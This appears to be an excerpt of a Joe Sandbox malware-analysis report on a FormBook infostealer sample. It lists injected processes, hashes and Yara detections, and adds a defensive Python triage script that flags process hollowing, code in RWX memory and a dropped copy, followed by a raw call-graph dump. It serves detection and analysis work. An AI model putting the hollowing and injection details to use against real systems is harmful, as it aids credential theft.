                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\xBzBOQwywT.exe"
                                                                      Imagebase:0xb10000
                                                                      File size:46'504 bytes
                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:09:27:16
                                                                      Start date:07/11/2024
                                                                      Path:C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe"
                                                                      Imagebase:0xa00000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:5
                                                                      Start time:09:27:17
                                                                      Start date:07/11/2024
                                                                      Path:C:\Windows\SysWOW64\RpcPing.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\RpcPing.exe"
                                                                      Imagebase:0xf40000
                                                                      File size:26'624 bytes
                                                                      MD5 hash:F7DD5764D96A988F0CF9DD4813751473
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:6
                                                                      Start time:09:27:30
                                                                      Start date:07/11/2024
                                                                      Path:C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe"
                                                                      Imagebase:0xa00000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:10
                                                                      Start time:09:27:43
                                                                      Start date:07/11/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff6d20e0000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true
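The process list above is where the signatures "Writes to foreign memory regions", "Modifies the context of a thread in another process" and "Maps a DLL or memory area into another process" become visible: Target 2 is svchost.exe, yet its recorded command line is the sample's own path, and its FormBook Yara hits sit in page-protection 0x40 (PAGE_EXECUTE_READWRITE) regions, one of them at 0x400000 rather than at the 0xb10000 image base the report records, which is consistent with a hollowed process. Targets 4 and 6 are the same dropped copy running from a long, random-looking directory under Program Files (x86), and RpcPing.exe (Target 5) carries hits in both RWX and plain read/write memory. The script below is an added triage example, not part of the Joe Sandbox report or its tooling; it re-derives those three indicators over entries transcribed from the list above (Target 6 is identical to Target 4 and is omitted). The .sdmp field layout it assumes (process id, dump index, timestamp, base address, page protection, then further flags) is an assumption about the report's naming; only the base and protection fields are decoded.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Windows memory-protection constant (winnt.h); 0x40 = PAGE_EXECUTE_READWRITE.
PAGE_EXECUTE_READWRITE = 0x40


@dataclass
class Proc:
    """One entry of the sandbox process list."""
    target_id: int
    path: str
    commandline: str
    imagebase: int
    yara_dumps: List[str] = field(default_factory=list)


# Transcribed from the process entries above (Target IDs 2, 4, 5, 10).
PROCESSES = [
    Proc(2, r"C:\Windows\SysWOW64\svchost.exe",
         r'"C:\Users\user\Desktop\xBzBOQwywT.exe"', 0xB10000,
         ["00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp",
          "00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp"]),
    Proc(4, r"C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe",
         r'"C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe"',
         0xA00000,
         ["00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp"]),
    Proc(5, r"C:\Windows\SysWOW64\RpcPing.exe", r'"C:\Windows\SysWOW64\RpcPing.exe"', 0xF40000,
         ["00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp",
          "00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp"]),
    Proc(10, r"C:\Program Files\Mozilla Firefox\firefox.exe",
         r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', 0x7FF6D20E0000),
]


def basename(p: str) -> str:
    """Case-folded file name of a Windows path, surrounding quotes stripped."""
    return p.strip('"').rsplit("\\", 1)[-1].lower()


def image_from_commandline(cmd: str) -> str:
    """First token of a command line, honouring a quoted executable path."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmd)
    return basename(m.group(1) or m.group(2))


def parse_dump_name(name: str) -> Dict[str, int]:
    """Assumed .sdmp layout: pid.index.timestamp.base.protection.type.state.x.sdmp.
    Only pid, base and protection are decoded; the rest is left alone."""
    f = name.split(".")
    return {"pid": int(f[0], 16), "base": int(f[3], 16), "protection": int(f[4], 16)}


# A directory name that is 30+ letters with no digits, spaces or punctuation.
_RANDOM_DIR = re.compile(r"^[A-Za-z]{30,}$")


def triage(p: Proc) -> List[str]:
    """Return the indicators this entry exhibits (empty list = nothing notable)."""
    findings: List[str] = []
    # 1. The image the command line names differs from the image actually mapped.
    if image_from_commandline(p.commandline) != basename(p.path):
        findings.append("command line names a different image than the path (hollowed process)")
    # 2. A Yara hit inside writable+executable memory, and whether it is at the image base.
    for d in p.yara_dumps:
        info = parse_dump_name(d)
        if info["protection"] == PAGE_EXECUTE_READWRITE:
            where = "at image base" if info["base"] == p.imagebase else f"outside image base (0x{info['base']:X})"
            findings.append(f"Yara hit in RWX memory {where} (injected or unpacked code)")
    # 3. Executable living in a random-looking folder under Program Files.
    parts = p.path.split("\\")
    if parts[1].lower().startswith("program files") and any(_RANDOM_DIR.match(c) for c in parts[2:-1]):
        findings.append("runs from a random-looking directory under Program Files (dropped copy)")
    return findings


def triage_all(procs: List[Proc]) -> Dict[int, List[str]]:
    return {p.target_id: triage(p) for p in procs}


if __name__ == "__main__":
    for tid, fs in triage_all(PROCESSES).items():
        print(f"Target {tid}: {fs or ['no findings']}")
```

The command-line check is the cheapest of the three to run at scale on EDR process-creation telemetry (compare the created image path with the first token of the command line), but it only catches hollowing where the sandbox or sensor records the original CreateProcess arguments; the RWX-region check needs a memory scan and is the one that actually locates the payload.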


                                                                        Execution Graph

                                                                        Execution Coverage:3.6%
                                                                        Dynamic/Decrypted Code Coverage:1.2%
                                                                        Signature Coverage:10.2%
                                                                        Total number of Nodes:2000
                                                                        Total number of Limit Nodes:35
[Execution graph data: the node/edge list behind the interactive graph (nodes 86196 onward, truncated in this extract) is not readable as text and is omitted here. Recoverable from it: the root is the window procedure at 0x4010e0 (DefWindowProcW, Shell_NotifyIconW, SetTimer/KillTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage); from there the graph reaches CRT start-up (GetStartupInfoW, HeapCreate, TlsAlloc, GetCommandLineW, GetEnvironmentStringsW, GetModuleFileNameW), debugger checks (IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess/TerminateProcess), registry reads (RegOpenKeyExW, RegQueryValueExW, RegCloseKey), dynamic imports (LoadLibraryA, GetProcAddress), window setup (RegisterClassExW, CreateWindowExW, LoadImageW, EnumResourceNamesW, SystemParametersInfoW), GetOpenFileNameW, SHGetMalloc, GetFullPathNameW, GetCurrentDirectoryW/SetCurrentDirectoryW, ShellExecuteW, MessageBoxA, a PeekMessageW/GetMessageW/TranslateMessage/DispatchMessageW loop, LockWindowUpdate/DestroyWindow, WaitForSingleObject/GetExitCodeProcess/CloseHandle, timeGetTime, VariantClear, RtlAllocateHeap/RtlFreeHeap and RaiseException.]
calls 86965->88159 86966->86737 86967->86719 86968->86726 86970 401b16 _wcslen 86969->86970 86971 4115d7 52 API calls 86970->86971 86974 401b63 86970->86974 86972 401b4b _memmove 86971->86972 86973 4115d7 52 API calls 86972->86973 86973->86974 86975 40d200 52 API calls 2 library calls 86974->86975 86975->86741 86976->86744 86978 40bc70 52 API calls 86977->86978 86979 401f31 86978->86979 86980 402560 86979->86980 86981 40256d __write_nolock 86980->86981 86982 402160 52 API calls 86981->86982 86984 402593 86982->86984 86991 4025bd 86984->86991 87067 401c90 86984->87067 86985 4026f0 52 API calls 86985->86991 86986 4026a7 86987 401b10 52 API calls 86986->86987 86994 4026db 86986->86994 86989 4026d1 86987->86989 86988 401b10 52 API calls 86988->86991 87071 40d7c0 52 API calls 2 library calls 86989->87071 86990 401c90 52 API calls 86990->86991 86991->86985 86991->86986 86991->86988 86991->86990 87070 40d7c0 52 API calls 2 library calls 86991->87070 86994->86799 87072 40f760 86995->87072 86998 410118 86998->86801 87000 42805d 87001 42806a 87000->87001 87128 431e58 87000->87128 87003 413748 _free 46 API calls 87001->87003 87004 428078 87003->87004 87005 431e58 82 API calls 87004->87005 87006 428084 87005->87006 87006->86801 87008 4115d7 52 API calls 87007->87008 87009 401f74 87008->87009 87009->86804 87011 4019a3 87010->87011 87016 401985 87010->87016 87012 4019b8 87011->87012 87011->87016 87735 403e10 53 API calls 87012->87735 87014 40199f 87014->86807 87015 4019c4 87015->86807 87016->87014 87734 403e10 53 API calls 87016->87734 87019 40c2c7 87018->87019 87020 40c30e 87018->87020 87023 40c2d3 87019->87023 87024 426c79 87019->87024 87021 40c315 87020->87021 87022 426c2b 87020->87022 87025 40c321 87021->87025 87026 426c5a 87021->87026 87028 426c4b 87022->87028 87029 426c2e 87022->87029 87736 403ea0 52 API calls __cinit 87023->87736 87741 4534e3 52 API calls 87024->87741 87737 403ea0 52 API calls __cinit 87025->87737 87740 4534e3 52 API calls 87026->87740 87739 4534e3 52 API 
calls 87028->87739 87034 40c2de 87029->87034 87738 4534e3 52 API calls 87029->87738 87034->86817 87037 401a30 87036->87037 87038 401a17 87036->87038 87040 402160 52 API calls 87037->87040 87039 401a2d 87038->87039 87742 403c30 52 API calls _memmove 87038->87742 87039->86821 87042 401a3d 87040->87042 87042->86821 87044 411523 87043->87044 87045 4114ba 87043->87045 87745 4113a8 58 API calls 3 library calls 87044->87745 87048 40200c 87045->87048 87743 417f77 46 API calls __getptd_noexit 87045->87743 87048->86824 87048->86825 87049 4114c6 87744 417f25 10 API calls __controlfp_s 87049->87744 87052 427c86 87051->87052 87053 40e84a 87051->87053 87752 40e1f0 VariantClear moneypunct 87052->87752 87746 40e950 87053->87746 87056 427c8b 87059 40e950 53 API calls 87056->87059 87058 40e85c 87060 4115d7 52 API calls 87058->87060 87063 4020bb 87058->87063 87059->87063 87061 40e8fc 87060->87061 87062 4115d7 52 API calls 87061->87062 87062->87063 87064 40cf00 53 API calls 87063->87064 87064->86855 87065->86860 87066->86860 87068 4026f0 52 API calls 87067->87068 87069 401c97 87068->87069 87069->86984 87070->86991 87071->86994 87132 40f6f0 87072->87132 87074 40f77b _strcat moneypunct 87140 40f850 87074->87140 87079 427c2a 87170 414d04 87079->87170 87081 40f7fc 87081->87079 87082 40f804 87081->87082 87157 414a46 87082->87157 87087 40f80e 87087->86998 87091 4528bd 87087->87091 87088 427c59 87176 414fe2 87088->87176 87090 427c79 87092 4150d1 _fseek 81 API calls 87091->87092 87093 452930 87092->87093 87676 452719 87093->87676 87096 452948 87096->87000 87097 414d04 __fread_nolock 61 API calls 87098 452966 87097->87098 87099 414d04 __fread_nolock 61 API calls 87098->87099 87100 452976 87099->87100 87101 414d04 __fread_nolock 61 API calls 87100->87101 87102 45298f 87101->87102 87103 414d04 __fread_nolock 61 API calls 87102->87103 87104 4529aa 87103->87104 87105 4150d1 _fseek 81 API calls 87104->87105 87106 4529c4 87105->87106 87107 4135bb _malloc 46 API calls 87106->87107 87108 4529cf 
87107->87108 87109 4135bb _malloc 46 API calls 87108->87109 87110 4529db 87109->87110 87111 414d04 __fread_nolock 61 API calls 87110->87111 87112 4529ec 87111->87112 87113 44afef GetSystemTimeAsFileTime 87112->87113 87114 452a00 87113->87114 87115 452a36 87114->87115 87116 452a13 87114->87116 87118 452aa5 87115->87118 87119 452a3c 87115->87119 87117 413748 _free 46 API calls 87116->87117 87121 452a1c 87117->87121 87120 413748 _free 46 API calls 87118->87120 87682 44b1a9 87119->87682 87123 452aa3 87120->87123 87124 413748 _free 46 API calls 87121->87124 87123->87000 87127 452a25 87124->87127 87125 452a9d 87126 413748 _free 46 API calls 87125->87126 87126->87123 87127->87000 87129 431e64 87128->87129 87131 431e6a 87128->87131 87130 414a46 __fcloseall 82 API calls 87129->87130 87130->87131 87131->87001 87133 425de2 87132->87133 87134 40f6fc _wcslen 87132->87134 87133->87074 87135 40f710 WideCharToMultiByte 87134->87135 87136 40f756 87135->87136 87137 40f728 87135->87137 87136->87074 87138 4115d7 52 API calls 87137->87138 87139 40f735 WideCharToMultiByte 87138->87139 87139->87074 87142 40f85d __localtime64_s _strlen 87140->87142 87141 426b3b 87142->87141 87144 40f7ab 87142->87144 87189 414db8 87142->87189 87145 4149c2 87144->87145 87204 414904 87145->87204 87147 40f7e9 87147->87079 87148 40f5c0 87147->87148 87153 40f5cd _strcat __write_nolock _memmove 87148->87153 87149 414d04 __fread_nolock 61 API calls 87149->87153 87151 425d11 87152 4150d1 _fseek 81 API calls 87151->87152 87154 425d33 87152->87154 87153->87149 87153->87151 87156 40f691 __tzset_nolock 87153->87156 87292 4150d1 87153->87292 87155 414d04 __fread_nolock 61 API calls 87154->87155 87155->87156 87156->87081 87158 414a52 type_info::_Type_info_dtor 87157->87158 87159 414a64 87158->87159 87160 414a79 87158->87160 87432 417f77 46 API calls __getptd_noexit 87159->87432 87162 415471 __lock_file 47 API calls 87160->87162 87166 414a74 type_info::_Type_info_dtor 87160->87166 87164 414a92 87162->87164 87163 414a69 
87433 417f25 10 API calls __controlfp_s 87163->87433 87416 4149d9 87164->87416 87166->87087 87501 414c76 87170->87501 87172 414d1c 87173 44afef 87172->87173 87669 442c5a 87173->87669 87175 44b00d 87175->87088 87177 414fee type_info::_Type_info_dtor 87176->87177 87178 414ffa 87177->87178 87179 41500f 87177->87179 87673 417f77 46 API calls __getptd_noexit 87178->87673 87181 415471 __lock_file 47 API calls 87179->87181 87183 415017 87181->87183 87182 414fff 87674 417f25 10 API calls __controlfp_s 87182->87674 87185 414e4e __ftell_nolock 51 API calls 87183->87185 87186 415024 87185->87186 87675 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 87186->87675 87188 41500a type_info::_Type_info_dtor 87188->87090 87190 414dd6 87189->87190 87191 414deb 87189->87191 87200 417f77 46 API calls __getptd_noexit 87190->87200 87191->87190 87193 414df2 87191->87193 87202 41b91b 79 API calls 11 library calls 87193->87202 87194 414ddb 87201 417f25 10 API calls __controlfp_s 87194->87201 87197 414e18 87198 414de6 87197->87198 87203 418f98 77 API calls 7 library calls 87197->87203 87198->87142 87200->87194 87201->87198 87202->87197 87203->87198 87206 414910 type_info::_Type_info_dtor 87204->87206 87205 414923 87260 417f77 46 API calls __getptd_noexit 87205->87260 87206->87205 87208 414951 87206->87208 87223 41d4d1 87208->87223 87209 414928 87261 417f25 10 API calls __controlfp_s 87209->87261 87212 414956 87213 41496a 87212->87213 87214 41495d 87212->87214 87216 414992 87213->87216 87217 414972 87213->87217 87262 417f77 46 API calls __getptd_noexit 87214->87262 87240 41d218 87216->87240 87263 417f77 46 API calls __getptd_noexit 87217->87263 87218 414933 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 87218->87147 87224 41d4dd type_info::_Type_info_dtor 87223->87224 87225 4182cb __lock 46 API calls 87224->87225 87238 41d4eb 87225->87238 87226 41d560 87265 41d5fb 87226->87265 87227 41d567 87228 416b04 __malloc_crt 46 API calls 87227->87228 87230 41d56e 87228->87230 87230->87226 
87232 41d57c InitializeCriticalSectionAndSpinCount 87230->87232 87231 41d5f0 type_info::_Type_info_dtor 87231->87212 87233 41d59c 87232->87233 87234 41d5af EnterCriticalSection 87232->87234 87237 413748 _free 46 API calls 87233->87237 87234->87226 87235 418209 __mtinitlocknum 46 API calls 87235->87238 87237->87226 87238->87226 87238->87227 87238->87235 87268 4154b2 47 API calls __lock 87238->87268 87269 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87238->87269 87241 41d23a 87240->87241 87242 41d255 87241->87242 87254 41d26c __wopenfile 87241->87254 87274 417f77 46 API calls __getptd_noexit 87242->87274 87244 41d421 87246 41d47a 87244->87246 87247 41d48c 87244->87247 87245 41d25a 87275 417f25 10 API calls __controlfp_s 87245->87275 87279 417f77 46 API calls __getptd_noexit 87246->87279 87271 422bf9 87247->87271 87251 41d47f 87280 417f25 10 API calls __controlfp_s 87251->87280 87252 41499d 87264 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87252->87264 87254->87244 87254->87246 87276 41341f 58 API calls 2 library calls 87254->87276 87256 41d41a 87256->87244 87277 41341f 58 API calls 2 library calls 87256->87277 87258 41d439 87258->87244 87278 41341f 58 API calls 2 library calls 87258->87278 87260->87209 87261->87218 87262->87218 87263->87218 87264->87218 87270 4181f2 LeaveCriticalSection 87265->87270 87267 41d602 87267->87231 87268->87238 87269->87238 87270->87267 87281 422b35 87271->87281 87273 422c14 87273->87252 87274->87245 87275->87252 87276->87256 87277->87258 87278->87244 87279->87251 87280->87252 87284 422b41 type_info::_Type_info_dtor 87281->87284 87282 422b54 87283 417f77 __controlfp_s 46 API calls 87282->87283 87285 422b59 87283->87285 87284->87282 87286 422b8a 87284->87286 87287 417f25 __controlfp_s 10 API calls 87285->87287 87288 422400 __tsopen_nolock 109 API calls 87286->87288 87290 422b63 type_info::_Type_info_dtor 87287->87290 87289 422ba4 87288->87289 87291 422bcb __wsopen_helper LeaveCriticalSection 87289->87291 
87290->87273 87291->87290 87295 4150dd type_info::_Type_info_dtor 87292->87295 87293 4150e9 87323 417f77 46 API calls __getptd_noexit 87293->87323 87295->87293 87296 41510f 87295->87296 87305 415471 87296->87305 87297 4150ee 87324 417f25 10 API calls __controlfp_s 87297->87324 87304 4150f9 type_info::_Type_info_dtor 87304->87153 87306 415483 87305->87306 87307 4154a5 EnterCriticalSection 87305->87307 87306->87307 87309 41548b 87306->87309 87308 415117 87307->87308 87311 415047 87308->87311 87310 4182cb __lock 46 API calls 87309->87310 87310->87308 87312 415067 87311->87312 87313 415057 87311->87313 87315 415079 87312->87315 87326 414e4e 87312->87326 87381 417f77 46 API calls __getptd_noexit 87313->87381 87343 41443c 87315->87343 87316 41505c 87325 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87316->87325 87321 4150b9 87356 41e1f4 87321->87356 87323->87297 87324->87304 87325->87304 87327 414e61 87326->87327 87328 414e79 87326->87328 87382 417f77 46 API calls __getptd_noexit 87327->87382 87329 414139 __filbuf 46 API calls 87328->87329 87331 414e80 87329->87331 87334 41e1f4 __write 51 API calls 87331->87334 87332 414e66 87383 417f25 10 API calls __controlfp_s 87332->87383 87335 414e97 87334->87335 87336 414f09 87335->87336 87338 414ec9 87335->87338 87342 414e71 87335->87342 87384 417f77 46 API calls __getptd_noexit 87336->87384 87339 41e1f4 __write 51 API calls 87338->87339 87338->87342 87340 414f64 87339->87340 87341 41e1f4 __write 51 API calls 87340->87341 87340->87342 87341->87342 87342->87315 87344 414477 87343->87344 87345 414455 87343->87345 87349 414139 87344->87349 87345->87344 87346 414139 __filbuf 46 API calls 87345->87346 87347 414470 87346->87347 87385 41b7b2 77 API calls 6 library calls 87347->87385 87350 414145 87349->87350 87351 41415a 87349->87351 87386 417f77 46 API calls __getptd_noexit 87350->87386 87351->87321 87353 41414a 87387 417f25 10 API calls __controlfp_s 87353->87387 87355 414155 87355->87321 87357 41e200 
type_info::_Type_info_dtor 87356->87357 87358 41e223 87357->87358 87359 41e208 87357->87359 87360 41e22f 87358->87360 87366 41e269 87358->87366 87408 417f8a 46 API calls __getptd_noexit 87359->87408 87410 417f8a 46 API calls __getptd_noexit 87360->87410 87363 41e20d 87409 417f77 46 API calls __getptd_noexit 87363->87409 87365 41e234 87411 417f77 46 API calls __getptd_noexit 87365->87411 87388 41ae56 87366->87388 87369 41e23c 87412 417f25 10 API calls __controlfp_s 87369->87412 87370 41e26f 87371 41e291 87370->87371 87372 41e27d 87370->87372 87413 417f77 46 API calls __getptd_noexit 87371->87413 87398 41e17f 87372->87398 87373 41e215 type_info::_Type_info_dtor 87373->87316 87377 41e289 87415 41e2c0 LeaveCriticalSection __unlock_fhandle 87377->87415 87378 41e296 87414 417f8a 46 API calls __getptd_noexit 87378->87414 87381->87316 87382->87332 87383->87342 87384->87342 87385->87344 87386->87353 87387->87355 87389 41ae62 type_info::_Type_info_dtor 87388->87389 87390 41aebc 87389->87390 87391 4182cb __lock 46 API calls 87389->87391 87392 41aec1 EnterCriticalSection 87390->87392 87393 41aede type_info::_Type_info_dtor 87390->87393 87394 41ae8e 87391->87394 87392->87393 87393->87370 87395 41aeaa 87394->87395 87396 41ae97 InitializeCriticalSectionAndSpinCount 87394->87396 87397 41aeec ___lock_fhandle LeaveCriticalSection 87395->87397 87396->87395 87397->87390 87399 41aded __chsize_nolock 46 API calls 87398->87399 87400 41e18e 87399->87400 87401 41e1a4 SetFilePointer 87400->87401 87402 41e194 87400->87402 87403 41e1c3 87401->87403 87404 41e1bb GetLastError 87401->87404 87405 417f77 __controlfp_s 46 API calls 87402->87405 87406 41e199 87403->87406 87407 417f9d __dosmaperr 46 API calls 87403->87407 87404->87403 87405->87406 87406->87377 87407->87406 87408->87363 87409->87373 87410->87365 87411->87369 87412->87373 87413->87378 87414->87377 87415->87373 87417 4149ea 87416->87417 87418 4149fe 87416->87418 87462 417f77 46 API calls __getptd_noexit 87417->87462 87420 4149fa 
87418->87420 87422 41443c __flush 77 API calls 87418->87422 87434 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87420->87434 87421 4149ef 87463 417f25 10 API calls __controlfp_s 87421->87463 87423 414a0a 87422->87423 87435 41d8c2 87423->87435 87427 414139 __filbuf 46 API calls 87428 414a18 87427->87428 87439 41d7fe 87428->87439 87430 414a1e 87430->87420 87431 413748 _free 46 API calls 87430->87431 87431->87420 87432->87163 87433->87166 87434->87166 87436 414a12 87435->87436 87437 41d8d2 87435->87437 87436->87427 87437->87436 87438 413748 _free 46 API calls 87437->87438 87438->87436 87440 41d80a type_info::_Type_info_dtor 87439->87440 87441 41d812 87440->87441 87443 41d82d 87440->87443 87479 417f8a 46 API calls __getptd_noexit 87441->87479 87444 41d839 87443->87444 87447 41d873 87443->87447 87481 417f8a 46 API calls __getptd_noexit 87444->87481 87445 41d817 87480 417f77 46 API calls __getptd_noexit 87445->87480 87450 41ae56 ___lock_fhandle 48 API calls 87447->87450 87449 41d83e 87482 417f77 46 API calls __getptd_noexit 87449->87482 87452 41d879 87450->87452 87454 41d893 87452->87454 87455 41d887 87452->87455 87453 41d846 87483 417f25 10 API calls __controlfp_s 87453->87483 87484 417f77 46 API calls __getptd_noexit 87454->87484 87464 41d762 87455->87464 87459 41d81f type_info::_Type_info_dtor 87459->87430 87460 41d88d 87485 41d8ba LeaveCriticalSection __unlock_fhandle 87460->87485 87462->87421 87463->87420 87486 41aded 87464->87486 87466 41d7c8 87499 41ad67 47 API calls 2 library calls 87466->87499 87467 41d772 87467->87466 87468 41d7a6 87467->87468 87470 41aded __chsize_nolock 46 API calls 87467->87470 87468->87466 87471 41aded __chsize_nolock 46 API calls 87468->87471 87473 41d79d 87470->87473 87474 41d7b2 CloseHandle 87471->87474 87472 41d7d0 87475 41d7f2 87472->87475 87500 417f9d 46 API calls 3 library calls 87472->87500 87476 41aded __chsize_nolock 46 API calls 87473->87476 87474->87466 87477 41d7be GetLastError 87474->87477 87475->87460 
87476->87468 87477->87466 87479->87445 87480->87459 87481->87449 87482->87453 87483->87459 87484->87460 87485->87459 87487 41ae12 87486->87487 87488 41adfa 87486->87488 87490 417f8a __set_osfhnd 46 API calls 87487->87490 87493 41ae51 87487->87493 87489 417f8a __set_osfhnd 46 API calls 87488->87489 87491 41adff 87489->87491 87492 41ae23 87490->87492 87494 417f77 __controlfp_s 46 API calls 87491->87494 87495 417f77 __controlfp_s 46 API calls 87492->87495 87493->87467 87496 41ae07 87494->87496 87497 41ae2b 87495->87497 87496->87467 87498 417f25 __controlfp_s 10 API calls 87497->87498 87498->87496 87499->87472 87500->87475 87502 414c82 type_info::_Type_info_dtor 87501->87502 87503 414cc3 87502->87503 87504 414c96 __localtime64_s 87502->87504 87505 414cbb type_info::_Type_info_dtor 87502->87505 87506 415471 __lock_file 47 API calls 87503->87506 87528 417f77 46 API calls __getptd_noexit 87504->87528 87505->87172 87508 414ccb 87506->87508 87514 414aba 87508->87514 87509 414cb0 87529 417f25 10 API calls __controlfp_s 87509->87529 87518 414ad8 __localtime64_s 87514->87518 87520 414af2 87514->87520 87515 414ae2 87581 417f77 46 API calls __getptd_noexit 87515->87581 87517 414ae7 87582 417f25 10 API calls __controlfp_s 87517->87582 87518->87515 87518->87520 87523 414b2d 87518->87523 87530 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87520->87530 87522 414c38 __localtime64_s 87584 417f77 46 API calls __getptd_noexit 87522->87584 87523->87520 87523->87522 87524 414139 __filbuf 46 API calls 87523->87524 87531 41dfcc 87523->87531 87561 41d8f3 87523->87561 87583 41e0c2 46 API calls 3 library calls 87523->87583 87524->87523 87528->87509 87529->87505 87530->87505 87532 41dfd8 